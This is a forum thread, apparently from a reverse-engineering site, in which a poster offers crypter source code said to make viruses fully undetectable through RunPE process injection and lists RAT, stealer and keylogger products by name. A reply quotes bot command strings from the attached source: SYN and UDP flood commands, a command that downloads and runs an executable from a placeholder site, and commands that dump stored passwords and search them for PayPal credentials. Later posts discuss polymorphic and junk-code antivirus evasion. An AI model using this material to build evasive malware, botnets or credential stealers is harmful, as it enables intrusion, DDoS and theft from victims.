Jump to content
Tuts 4 You

Crypter overview


cipher

Recommended Posts

hello

i am here today with the executable that can obfuscate the virus and makes it fully undetectable from anti-viruses.This executable uses runPE techniques to inject into other process and to dump the crypted code into memory and hence the executable's code remain undetected by Anti-viruses.

These crypters are programmed by individuals and hence remains undetected most of the time .Mostly they are coded in VB or .Net and hence you will find most of the viruses showing vb attributes during PE Scans ,but mostly the viruses/RATs/Stealers/Bots/Worms are coded in borland Delphi.

Examples :

1) RATS : cybergate,Blackshades,pixel,spynet,darkcomet etc

2) STEALERS : Istealer v6.0(latest),Albertino,maya password stealer etc

3) KEYLOGGERS : Albertino , Rapzo ,Irtech etc

4) Crypters : icrypt , galaxy ,balckout AIO,demon ,cypherx(www.crypters.net) etc.

The sample crypter source code is attached here .

CodingNation_Crypter_Source.rar

Link to comment
Share on other sites

  • 2 months later...
http://www.virustotal.com/file-scan/report.html?id=7d389377a5bf54147bc675df8a1ca0742991224b3c21e1ad7aa131e6b81575fc-1301452801
http://www.virustotal.com/file-scan/report.html?id=a77380725c96204df0bbad34a715358b1e193989f3e9053cefe80a73ad19816c-1301452813

i think the below code must not be present in a crypter project this makes it behave like a bot


hello [login]
.bai [logout]
.removeAll [removes ALL bots]DDoS CMDs./syn (google.com 80 1000)
./udp (google.com 80 1000) Careful might destroy botsDownload/Update./download (http://site.com/file.exe C:\file.exe 1)
./update (????)MSC
./msnmsg (hey is this you? www.yoursite.com)
./visit (http://site.com/)
./pstore (all pswds)
./pstoreS (./pstoreS paypal: searches paypal)
Link to comment
Share on other sites

  • 2 months later...

@Cipher : Thanks Mate, but old guddys i played with them when I was learning CEH. This guddys are no more, for example in our team ICA, we dont use like this.

Try the self mod version of Fly Crypter.

And also nice name collection of RAT's.

@ksanket : These codes are not used to make behave like a bot, this codes are part of Trojan or stealer's.

Link to comment
Share on other sites

  • 1 month later...

@Blue indian : i guess you are talking about polymorphic engine , but still 99% of the crypters in market uses the same PE injection technique.

i Dunno much about the polymorphic engine tho still they manage to make it FUD by adding junk code , by changing the variable names and by some advanced techniques.

Link to comment
Share on other sites

  • 1 year later...

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...